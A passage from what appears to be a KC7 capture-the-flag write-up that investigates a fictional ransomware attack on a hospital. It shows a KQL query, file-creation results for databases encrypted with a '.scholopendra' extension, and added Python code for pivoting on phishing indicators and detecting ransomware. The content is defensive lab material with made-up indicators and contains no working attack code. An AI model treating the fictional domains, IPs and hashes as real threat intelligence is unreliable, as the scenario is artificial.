Evidently, the threat actor did their research. Notably, out of all their IP addresses, only one didn't browse our webpage.

The information they looked for included (clumsily) the hospital's finances (especially revenue and profits); its network architecture, IT protocols, employee contact information, and IT and cybersecurity staff; the ERP system and its designer, Database Administrator Roy Trenemman; the recent staff layoffs and other cost-cutting measures (which included the creation and deployment of an in-house ERP system); and the ERP system's design, such as the technologies used (SQLite, among others). Most damning, the threat actors were looking for ways to access pediatric patient records.

Unfortunately, they did access the internal share containing these records (https://azurecresthospital.med/internal_share/medical_records/pediatric) on March 1st.
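The pivot above (phishing subject to sender, sender to link domain, domain to resolved IPs via PassiveDns, IPs to InboundNetworkEvents) is the same chain-of-lookups pattern as the earlier outbound-download query, and it generalizes to any email-borne indicator. The following is an added example in standalone Python, not the page's KQL and not KC7 code, implementing that chain over constructed sample rows: the sender address, the medequippros.org rows, the 203.0.113.10 address and the user-agent strings other than the Opera one quoted in the table are placeholders; the page's own domain and IP values are reused where they appear.

```python
"""Added example (not the page's KQL nor KC7 code): the Email -> PassiveDns ->
InboundNetworkEvents pivot from the write-up, over constructed sample rows."""
from __future__ import annotations

from collections import defaultdict
from urllib.parse import urlparse

PHISH_SUBJECT = "[EXTERNAL] 👶 New! Revolutionary Pediatric Healthcare Strategies ✨"
OPERA_UA = "Opera/9.63.(Windows CE; lb-LU) Presto/2.9.161 Version/12.00"

# Constructed Email rows: (sender, reply_to, subject, link). Sender addresses are placeholders.
EMAILS = [
    ("updates@pediatric-strategies.example", "", PHISH_SUBJECT,
     "https://unhealthyrecordsystems.tech/New_Healthcare_Protocols.docm"),
    ("updates@pediatric-strategies.example", "", "Re: pediatric update",
     "https://unhealthyrecordsystems.tech/Pediatric_Care_Update.docm"),
    ("billing@medequippros.org", "", "Invoice", "https://medequippros.org/invoices/0001"),
]

# Constructed PassiveDns rows: (domain, ip). 203.0.113.10 is a documentation-range placeholder.
PASSIVE_DNS = [
    ("unhealthyrecordsystems.tech", "93.142.203.80"),
    ("unhealthyrecordsystems.tech", "25.126.98.121"),
    ("unhealthyrecordsystems.tech", "115.12.60.150"),
    ("medequippros.org", "203.0.113.10"),
]

# Constructed InboundNetworkEvents rows: (timestamp, src_ip, user_agent, url).
INBOUND = [
    ("2024-03-01 11:05:22", "93.142.203.80", OPERA_UA,
     "https://azurecresthospital.med/search=Does+Azure+Crest+Hospital+have+a+lot+of+money%3F"),
    ("2024-03-01 16:28:22", "115.12.60.150", OPERA_UA,
     "https://azurecresthospital.med/internal_share/medical_records/pediatric"),
    ("2024-03-01 16:28:41", "93.142.203.80", OPERA_UA,
     "https://azurecresthospital.med/staff_directory/pediatric_department"),
    ("2024-03-01 16:29:14", "93.142.203.80", OPERA_UA,
     "https://azurecresthospital.med/news/penny-pincher-boasts-about-cost-cutting-on-it-department"),
    ("2024-03-01 10:00:00", "203.0.113.10", "Mozilla/5.0 (placeholder partner browser)",
     "https://azurecresthospital.med/"),
]


def phishing_senders(emails, subject=PHISH_SUBJECT):
    """Senders of the lure; KQL's =~ is case-insensitive, so compare casefolded subjects."""
    return {sender for sender, _reply, subj, _link in emails if subj.casefold() == subject.casefold()}


def malicious_domains(emails, senders):
    """Link hosts from any mail sent by, or replying to, a known bad sender."""
    return {urlparse(link).hostname for sender, reply_to, _subj, link in emails
            if link and (sender in senders or reply_to in senders)}


def domains_to_ips(domains, passive_dns):
    return {ip for domain, ip in passive_dns if domain in domains}


def recon_activity(ips, inbound):
    """Web requests from the resolved IPs, plus the IPs that never touched the site."""
    hits = sorted((ts, ip, url) for ts, ip, _ua, url in inbound if ip in ips)
    silent = set(ips) - {ip for _ts, ip, _url in hits}
    return hits, silent


def sensitive_hits(hits, prefixes=("/internal_share/", "/staff_directory/")):
    """Requests that reached non-public paths rather than the search page."""
    return [(ts, ip, url) for ts, ip, url in hits if urlparse(url).path.startswith(prefixes)]


def user_agent_overlap(ips, inbound):
    """Distinct recon IPs per user agent; one UA across many IPs points at a single operator."""
    by_ua = defaultdict(set)
    for _ts, ip, ua, _url in inbound:
        if ip in ips:
            by_ua[ua].add(ip)
    return {ua: len(addrs) for ua, addrs in by_ua.items()}


if __name__ == "__main__":
    bad_ips = domains_to_ips(malicious_domains(EMAILS, phishing_senders(EMAILS)), PASSIVE_DNS)
    requests, never_browsed = recon_activity(bad_ips, INBOUND)
    print(requests, never_browsed, sensitive_hits(requests), user_agent_overlap(bad_ips, INBOUND))
```

Returning the silent IPs explicitly reproduces the observation made below about the one address that never browsed the site, and the user-agent overlap makes the shared Opera string visible as a pivot in its own right.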

As mentioned, UrTottalyPwned.bat rendered the databases inaccessible. Perhaps FileCreationEvents has a hint: for example, whether they were encrypted and, if so, with what file extension, and which hostnames besides the server could have been affected.

FileCreationEvents
| where timestamp >= datetime(2024-04-02 11:31:47.0000) //when the Batch script was executed
Query Results
This table has been redacted; it only shows the most relevant findings, rather than the entire output of the KQL query above.
timestamp hostname username sha256 path filename process_name
2024-04-02 11:32:29.0000 SUPER-DB-SERVER-9000 rotrenneman 3b8daeb7c5307430f836c6ca58b432828ea58dcc8b6dd953f12e6eeeb8e86c29 C:\System\Database\hospital_scheduling.db.scholopendra hospital_scheduling.db.scholopendra explorer.exe
2024-04-02 11:32:48.0000 SUPER-DB-SERVER-9000 rotrenneman c551a57313e279dada8f0d580f6cbbff68820f0bcd22115b8872f92257048ada C:\System\Database\financial_data.db.scholopendra financial_data.db.scholopendra explorer.exe
2024-04-02 11:32:49.0000 SUPER-DB-SERVER-9000 rotrenneman d4651af07de3c464181de6c0c1f39a27f279eaf342596b2ae067aca964eaf364 C:\System\Database\employee_info.db.scholopendra employee_info.db.scholopendra explorer.exe
2024-04-02 11:32:52.0000 SUPER-DB-SERVER-9000 rotrenneman a1aa6bccae477706d0f47c2302bd8183c86fb39a158f8e804fee97a291ee3b02 C:\System\Database\pediatric_patient_data.db.scholopendra pediatric_patient_data.db.scholopendra explorer.exe
2024-04-02 11:33:14.0000 SUPER-DB-SERVER-9000 rotrenneman efbdda5c9a85317cae21333e09f2f622a5b14ebe8b7c5d80aca306f4957f953d C:\System\Database\research_data.db.scholopendra research_data.db.scholopendra explorer.exe
2024-04-02 11:33:16.0000 SUPER-DB-SERVER-9000 rotrenneman ccbaab672fd2a8412d61f0a82838633052544e6bf5996ed9c5bbf503665de6b8 C:\System\Database\medical_inventories.db.scholopendra medical_inventories.db.scholopendra explorer.exe
2024-04-02 11:33:17.0000 SUPER-DB-SERVER-9000 rotrenneman 6c9e68ecce293439118058f371c3f42b1b8b755553eada70e010a206ca6f5a8a C:\System\Database\patient_records.db.scholopendra patient_records.db.scholopendra explorer.exe
2024-04-02 11:36:30.0000 SUPER-DB-SERVER-9000 rotrenneman 4f31fbaf3f3c5f3c5d5338154769ccfe74530e30bb5f307a02bdef59d98dc507 C:\In\ItWentWrong.jpg ItWentWrong.jpg firefox.exe
2024-04-02 11:37:54.0000 SUPER-DB-SERVER-9000 rotrenneman 80116ec6ed1f703b11bf20f46523115ee1ed8a297f9104569e7b206f81d69d51 C:\Users\rotrenneman\Desktop\WhatCouldPossiblyGoWrong.txt WhatCouldPossiblyGoWrong.txt explorer.exe

Not shown in the table above (which is an excerpt of the full results): the Batch script encrypted all of Roy Trenemman's files (miscellaneous documents, images, etc.) and, since his device doubled as the hospital's ERP server, the databases themselves. The table also shows when the threat actor downloaded the mocking ransom wallpaper (set as the desktop wallpaper across all devices) and a ransom note (or at least a taunt) named WhatCouldPossiblyGoWrong.txt, likely referencing an article of that nature that the threat actors read during their recon.

The files were encrypted and appended with the .scholopendra file extension.
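The .db.scholopendra pattern (a known data extension with an unfamiliar suffix appended, many times on one host in under a minute) is the signal a file-creation detection would use, without needing to know the extension name in advance. The following is an added example in standalone Python, not the page's KQL and not KC7 code: it scans constructed FileCreationEvents rows modelled on the table above, flags bursts of appended extensions per host, and then looks for a .txt created shortly after the burst as a ransom-note candidate. The 5-minute window, the minimum of 5 files, the 10-minute note window, the list of known data extensions and the benign UBAA-MACHINE rows are assumptions.

```python
"""Added example (not the page's KQL nor KC7 code): detect bulk creation of
files with an extension appended to a data-file extension, then look for a
ransom-note candidate on the affected host. Thresholds are assumed values."""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Assumed list of extensions the hospital's data normally carries.
KNOWN_DATA_EXTENSIONS = {".db", ".sql", ".mdb", ".docx", ".xlsx", ".pdf", ".jpg", ".txt"}

# Constructed FileCreationEvents rows: (timestamp, hostname, filename), modelled on the table above.
FILE_EVENTS = [
    ("2024-04-02 11:32:29", "SUPER-DB-SERVER-9000", "hospital_scheduling.db.scholopendra"),
    ("2024-04-02 11:32:48", "SUPER-DB-SERVER-9000", "financial_data.db.scholopendra"),
    ("2024-04-02 11:32:49", "SUPER-DB-SERVER-9000", "employee_info.db.scholopendra"),
    ("2024-04-02 11:32:52", "SUPER-DB-SERVER-9000", "pediatric_patient_data.db.scholopendra"),
    ("2024-04-02 11:33:14", "SUPER-DB-SERVER-9000", "research_data.db.scholopendra"),
    ("2024-04-02 11:33:16", "SUPER-DB-SERVER-9000", "medical_inventories.db.scholopendra"),
    ("2024-04-02 11:33:17", "SUPER-DB-SERVER-9000", "patient_records.db.scholopendra"),
    ("2024-04-02 11:36:30", "SUPER-DB-SERVER-9000", "ItWentWrong.jpg"),
    ("2024-04-02 11:37:54", "SUPER-DB-SERVER-9000", "WhatCouldPossiblyGoWrong.txt"),
    # Constructed benign rows on another host: a single backup copy and a normal document.
    ("2024-04-02 09:15:00", "UBAA-MACHINE", "notes.db.bak"),
    ("2024-04-02 09:16:00", "UBAA-MACHINE", "report.docx"),
]


def _parse(events):
    return sorted((datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), host, name) for ts, host, name in events)


def appended_extension(filename):
    """Return the unfamiliar suffix if it follows a known data extension, else None."""
    suffixes = [s.lower() for s in PureWindowsPath(filename).suffixes]
    if (len(suffixes) >= 2 and suffixes[-2] in KNOWN_DATA_EXTENSIONS
            and suffixes[-1] not in KNOWN_DATA_EXTENSIONS):
        return suffixes[-1]
    return None


def encryption_bursts(events, window=timedelta(minutes=5), min_count=5):
    """(host, appended extension) -> {count, first, last} for the largest burst inside one window."""
    stamps = defaultdict(list)
    for ts, host, name in _parse(events):
        ext = appended_extension(name)
        if ext:
            stamps[(host, ext)].append(ts)
    bursts = {}
    for key, times in stamps.items():              # times are already sorted
        for i, start in enumerate(times):
            run = [t for t in times[i:] if t - start <= window]
            if len(run) >= min_count and len(run) > bursts.get(key, {}).get("count", 0):
                bursts[key] = {"count": len(run), "first": start, "last": run[-1]}
    return bursts


def ransom_note_candidates(events, bursts, after=timedelta(minutes=10)):
    """Text files created on a flagged host within `after` of the burst ending."""
    burst_end = {host: info["last"] for (host, _ext), info in bursts.items()}
    notes = []
    for ts, host, name in _parse(events):
        end = burst_end.get(host)
        if end is not None and name.lower().endswith(".txt") and end <= ts <= end + after:
            notes.append((host, name))
    return notes


if __name__ == "__main__":
    found = encryption_bursts(FILE_EVENTS)
    print(found)
    print(ransom_note_candidates(FILE_EVENTS, found))
```

Keying on the structure of the filename rather than on the literal string scholopendra means the same check would have caught a different extension, and the per-host grouping answers the question raised above about which hostnames beyond the server were hit: every host that appears as a key in the result.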

Section 5 - Bonus: Mo' Money Mo' Problems

Breaking kayfabe for a bit: this section of the game corresponds to various trivia questions (such as who hosts which cybersecurity podcast) and some slight CTF-like puzzles (such as deobfuscating strings that use a variety of cipher algorithms, such as ROT13, or encoding schemes such as Base64). It is thus omitted, but I do recommend tools such as CyberChef and dCode.fr for these.